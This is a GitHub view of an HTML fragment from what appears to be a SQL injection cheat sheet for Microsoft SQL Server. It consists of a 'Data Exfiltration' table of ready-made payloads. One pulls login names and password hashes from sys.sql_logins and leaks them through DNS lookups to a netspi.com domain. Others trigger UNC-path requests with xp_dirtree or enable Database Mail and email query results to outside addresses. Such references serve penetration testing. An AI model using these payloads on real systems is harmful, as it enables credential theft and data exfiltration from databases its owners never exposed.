-
Notifications
You must be signed in to change notification settings - Fork 148
Expand file tree
/
Copy pathsqlserver.html
More file actions
46 lines (44 loc) · 2.06 KB
/
sqlserver.html
File metadata and controls
46 lines (44 loc) · 2.06 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<h3 id="data-exfiltration">Data Exfiltration</h3>
<p class="pageDescription">{{site.data.injectionDescriptions.dataExfiltration}}</p>
<p><i>Note: It is possible to make a DNS request from MSSQL. However, this request requires administrator privileges and SQL Server 2005.</i></p>
<table class="table table-striped table-hover">
<thead>
<tr>
<th>Description</th>
<th>Query</th>
</tr>
</thead>
<tbody>
<tr>
<td>Make DNS Request</td>
<td>DECLARE @host varchar(800);<br>select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.netspi.com' from sys.sql_logins;<br>exec('xp_fileexist "\' + @host + 'c$boot.ini"');</td>
</tr>
<tr>
<td>UNC Path (DNS Request)</td>
<td>
xp_dirtree '\\data.domain.com\file' <br>
The UNC Path Injection Cheatsheet can be found <a href="https://github.com/NetSPI/PowerUpSQL/wiki/SQL-Server---UNC-Path-Injection-Cheat-Sheet">here</a>.
</td>
</tr>
<tr>
<td>Enable sp_send_dbmail and send query</td>
<td>sp_configure 'show advanced options', 1;RECONFIGURE;sp_configure 'Database Mail XPs', 1;RECONFIGURE;exec msdb..sp_send_dbmail @recipients='harold@netspi.com',@query='select @@version';</td>
</tr>
<tr>
<td>Basic xp_sendmail Query</td>
<td>EXEC master..xp_sendmail 'harold@netspi.com', 'This is a test.'</td>
</tr>
<tr>
<td>Send Full Email with xp_sendmail</td>
<td>EXEC xp_sendmail @recipients='harold@netspi.com',<br>@message='This is a test.',<br>@copy_recipients='test@netspi.com',<br>@subject='TEST'</td>
</tr>
<tr>
<td>Send Query Results Via xp_sendmail</td>
<td>EXEC xp_sendmail 'harold@netspi.com', @query='SELECT @@version';</td>
</tr>
<tr>
<td>Send Query Results as Attachment Via xp_sendmail</td>
<td>CREATE TABLE ##texttab (c1 text)<br>INSERT ##texttab values ('Put messge here.')<br>DECLARE @cmd varchar(56)<br>SET @cmd = 'SELECT c1 from ##texttab'<br>EXEC master.dbo.xp_sendmail 'robertk',<br>@query = @cmd, @no_header='TRUE'<br>DROP TABLE ##texttab</td>
</tr>
</tbody>
</table>